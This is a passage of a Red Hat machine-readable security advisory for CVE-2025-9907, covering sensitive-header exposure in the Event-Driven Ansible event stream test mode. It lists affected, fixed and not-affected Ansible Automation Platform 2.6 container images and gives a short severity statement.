"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Elijah DeLee"
],
"organization": "Red Hat",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2025-9907",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2025-09-03T07:28:31.788000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2392834"
}
],
"notes": [
{
"category": "description",
"text": "No description is available for this CVE.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "event-driven-ansible: Event Stream Test Mode Exposes Sensitive Headers in AAP EDA",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is classified as Moderate because the exposure of sensitive headers, including client Authorization tokens and internal infrastructure values such as X-Trusted-Proxy, can lead to credential leakage and privilege escalation only after user forced mistake and with specific configuration. Exploitation does not require complex conditions\u2014any user with read access to the event stream can retrieve the headers once a request has been posted in test mode. Exploitation depends on either a user mistakenly sending credentials to the event stream endpoint or internal headers being injected when the wrong path is used. The persistence of captured headers further increases risk, as sensitive values remain accessible until explicitly overwritten or deleted.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
